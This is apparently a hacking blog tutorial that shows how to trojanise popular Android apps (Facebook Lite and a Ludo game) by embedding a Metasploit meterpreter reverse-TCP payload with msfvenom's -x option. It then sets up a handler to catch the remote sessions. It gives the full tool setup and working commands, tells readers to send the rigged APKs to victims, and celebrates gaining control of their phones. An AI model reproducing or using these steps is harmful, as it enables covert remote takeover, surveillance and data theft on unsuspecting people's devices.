Hey Folks, I think we are all familiar with the Metasploit framework and whenever a beginner makes their move in the [email protected] field their first objective is to [email protected] android smartphones but they are not satisfied with creating a simple backdoor so they try to inject malicious payloads into the well known application such as : WhatsApp, Instagram and Facebook to cheat the victim. But usually while doing this activity we face many types of errors, but in this article we will guide you the complete steps through which you can inject or embed any malicious payload in any known application.
- Kali Linux = 2020.1
- APKsigner or Jarsigner [One of them]
- APK Tool [Latest]
Lets take a look 🙂 !!
Relax 🙂 !! We will not try to cheat with you and even you can satisfy yourself by seeing the machine details in clear text. HaPpY 🙂 !!
Let’s go ahead and first we download all the dependencies or requirements that we must have to embed the payload in the original APK. Lets download the dependencies one by one and first we will download the leading tool called “apktool“. it will compile and decompile the apk files.
apt install apktool
Zipalign is an archive tool that provides important optimization to Android application files but make sure it must only be performed before the APK file has been signed.
apt install zipalign
JAR Signing and Verification Tool use to sign JAR files and time stamp the signature. But we have to install java in our machine to configure jarsigner. The command are given below, so just execute it on terminal.
apt-get install openjdk-11-jdk
In the following version of Kali Linux we use Java JDK 8 by default, but after executing the following command it will give us two options in which we have to select Java JDK 11.
update-alternatives --config java
After selecting it the jarsigner will automatically be configured on the terminal.
The configuration is complete and our first attempt is going to be awesome as we will try to inject the malicious Metasploit payload into a well-known Facebook Lite APK. First download the apk from here.
The method is very simple and as we use the command during payload creation, in the same command just we add the “-x” parameter to inject the payload into the original apk. Also you can see the result through the given image in which we have successfully injected the payload into the Facebook Lite application.
msfvenom -x facebook-lite.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o Facebook.apk
Now you can send your payload to the victims according to your own. But as you can see the payload will look like below after downloading.
Lets come back to the kali linux and start multi handler to kept the meterpreter session by using the following command.
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10
set lport 4444
Boom 🙂 !! As you can see that we got a meterpreter session after click the application by victim. Although we got success in payload injection. But take another application and try to inject payload into it. You can also download from here.
Now again we will follow the same steps that we followed above and try to inject the payload into the official Ludo application.
msfvenom -x com.azodus.ludo.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o Ludo.apk
Swag 🙂 !! WOOOOOOO ! Again we got success to embed malicious payload into the original apk and also we have successfully get the meterpreter session again.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.